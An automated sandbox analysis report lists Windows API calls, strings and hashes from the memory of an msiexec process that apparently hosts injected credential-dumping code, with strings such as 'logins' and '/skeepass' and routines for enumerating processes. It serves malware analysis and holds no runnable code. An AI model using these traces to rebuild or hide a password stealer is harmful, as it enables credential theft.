                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _snwprintf$memset$wcscpy
                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                    • API String ID: 2000436516-3842416460
                                                    • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                    • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                    • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                    • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                    APIs
                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                      • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                      • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                      • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                    • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                    • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                    • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                    • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                    • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                    • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                    • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                    • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                    • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                    • String ID:
                                                    • API String ID: 1043902810-0
                                                    • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                    • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                    • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                    • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                    APIs
                                                    • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                    • _snwprintf.MSVCRT ref: 0044488A
                                                    • wcscpy.MSVCRT ref: 004448B4
                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ??2@??3@_snwprintfwcscpy
                                                    • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                    • API String ID: 2899246560-1542517562
                                                    • Opcode ID: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                    • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                    • Opcode Fuzzy Hash: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                    • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                    APIs
                                                    • memset.MSVCRT ref: 0040DBCD
                                                    • memset.MSVCRT ref: 0040DBE9
                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                      • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                      • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                      • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                    • wcscpy.MSVCRT ref: 0040DC2D
                                                    • wcscpy.MSVCRT ref: 0040DC3C
                                                    • wcscpy.MSVCRT ref: 0040DC4C
                                                    • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                    • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                    • wcscpy.MSVCRT ref: 0040DCC3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                    • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                    • API String ID: 3330709923-517860148
                                                    • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                    • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                    • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                    • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                    APIs
                                                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                      • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                    • memset.MSVCRT ref: 0040806A
                                                    • memset.MSVCRT ref: 0040807F
                                                    • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                    • _wcsicmp.MSVCRT ref: 004081C3
                                                    • memset.MSVCRT ref: 004081E4
                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                      • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                      • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                    • String ID: logins$null
                                                    • API String ID: 2148543256-2163367763
                                                    • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                    • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                    • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                    • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                    APIs
                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                    • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                    • memset.MSVCRT ref: 004085CF
                                                    • memset.MSVCRT ref: 004085F1
                                                    • memset.MSVCRT ref: 00408606
                                                    • strcmp.MSVCRT ref: 00408645
                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                    • memset.MSVCRT ref: 0040870E
                                                    • strcmp.MSVCRT ref: 0040876B
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                    • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                    • String ID: ---
                                                    • API String ID: 3437578500-2854292027
                                                    • Opcode ID: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                    • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                    • Opcode Fuzzy Hash: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                    • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                    APIs
                                                    • memset.MSVCRT ref: 0041087D
                                                    • memset.MSVCRT ref: 00410892
                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                    • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                    • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                    • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                    • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                    • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                    • GetSysColor.USER32(0000000F), ref: 00410999
                                                    • DeleteObject.GDI32(?), ref: 004109D0
                                                    • DeleteObject.GDI32(?), ref: 004109D6
                                                    • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                    • String ID:
                                                    • API String ID: 1010922700-0
                                                    • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                    • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                    • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                    • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                    APIs
                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                    • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                    • malloc.MSVCRT ref: 004186B7
                                                    • free.MSVCRT ref: 004186C7
                                                    • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                    • free.MSVCRT ref: 004186E0
                                                    • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                    • malloc.MSVCRT ref: 004186FE
                                                    • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                    • free.MSVCRT ref: 00418716
                                                    • free.MSVCRT ref: 0041872A
                                                    • free.MSVCRT ref: 00418749
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: free$FullNamePath$malloc$Version
                                                    • String ID: |A
                                                    • API String ID: 3356672799-1717621600
                                                    • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                    • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                    • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                    • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _wcsicmp
                                                    • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                    • API String ID: 2081463915-1959339147
                                                    • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                    • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                    • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                    • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                    APIs
                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                    • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                    • API String ID: 2012295524-70141382
                                                    • Opcode ID: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                    • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                    • Opcode Fuzzy Hash: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                    • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$HandleModule
                                                    • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                    • API String ID: 667068680-3953557276
                                                    • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                    • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                    • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                    • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 004121FF
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                    • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                    • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                    • SelectObject.GDI32(?,?), ref: 00412251
                                                    • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                    • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                      • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                      • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                      • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                    • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                    • SetCursor.USER32(00000000), ref: 004122BC
                                                    • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                    • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                    • String ID:
                                                    • API String ID: 1700100422-0
                                                    • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                    • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                    • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                    • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                    APIs
                                                    • GetClientRect.USER32(?,?), ref: 004111E0
                                                    • GetWindowRect.USER32(?,?), ref: 004111F6
                                                    • GetWindowRect.USER32(?,?), ref: 0041120C
                                                    • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                    • GetWindowRect.USER32(00000000), ref: 0041124D
                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                    • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                    • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                    • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                    • String ID:
                                                    • API String ID: 552707033-0
                                                    • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                    • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                    • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                    • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset$_snwprintf
                                                    • String ID: %%0.%df
                                                    • API String ID: 3473751417-763548558
                                                    • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                    • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                    • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                    • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                    APIs
                                                    • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                    • KillTimer.USER32(?,00000041), ref: 004060D7
                                                    • KillTimer.USER32(?,00000041), ref: 004060E8
                                                    • GetTickCount.KERNEL32 ref: 0040610B
                                                    • GetParent.USER32(?), ref: 00406136
                                                    • SendMessageW.USER32(00000000), ref: 0040613D
                                                    • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                    • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                    • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                    • String ID: A
                                                    • API String ID: 2892645895-3554254475
                                                    • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                    • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                    • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                    • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                    APIs
                                                    • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                      • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                      • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                      • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                      • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                    • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                    • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                    • GetDesktopWindow.USER32 ref: 0040D9FD
                                                    • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                    • memset.MSVCRT ref: 0040DA23
                                                    • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                    • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                    • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                      • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
